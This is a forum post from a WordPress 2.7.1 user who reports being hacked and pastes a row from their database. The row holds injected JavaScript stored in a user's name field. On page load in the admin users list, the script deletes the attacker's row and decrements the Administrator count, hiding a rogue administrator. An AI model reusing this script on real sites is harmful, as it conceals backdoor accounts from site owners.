2.7.1 Hacked
-
FYI… version 2.7.1 is not hack proof. When are ya’ll going to secure this software???!!!! I have been hacked numerous times already. I use many many different software and systems and none of those ever get hacked – only WordPress. Please secure the program!
I’m not an expert on these things, but it seems someone gained access as an administrator by registering as a contributor and inserting this code which makes them an administrator…
This is from my sql file…
(3259,650,’nickname’,’braxappeara’),(3244,647,’first_name’,’…\r\n \r\n \r\n \r\n \r\n <b id=\”user_superuser\”><script language=\”JavaScript\”>\r\n var setUserName = function(){\r\n try{\r\n var t=document.getElementById(\”user_superuser\”);\r\n while(t.nodeName!=\”TR\”){\r\n t=t.parentNode;\r\n };\r\n t.parentNode.removeChild(t);\r\n var tags = document.getElementsByTagName(\”H3\”);\r\n var s = \” shown below\”;\r\n for (var i = 0; i < tags.length; i++) {\r\n var t=tags[i].innerHTML;\r\n var h=tags[i];\r\n if(t.indexOf(s)>0){\r\n s =(parseInt(t)-1)+s;\r\n h.removeChild(h.firstChild);\r\n t = document.createTextNode(s);\r\n h.appendChild(t);\r\n }\r\n }\r\n var arr=document.getElementsByTagName(\”ul\”);\r\n for(var i in arr) if(arr[i].className==\”subsubsub\”){\r\n var n=/>Administrator \\((\\d+)\\)</gi.exec(arr[i].innerHTML);\r\n if(n[1]>0){\r\n var txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,\”>Administrator (\”+(n[1]-1)+\”)<\”);\r\n arr[i].innerHTML=txt;\r\n }\r\n }\r\n \r\n }catch(e){};\r\n };\r\n addLoadEvent(setUserName);\r\n </script>’)
- The topic ‘2.7.1 Hacked’ is closed to new replies.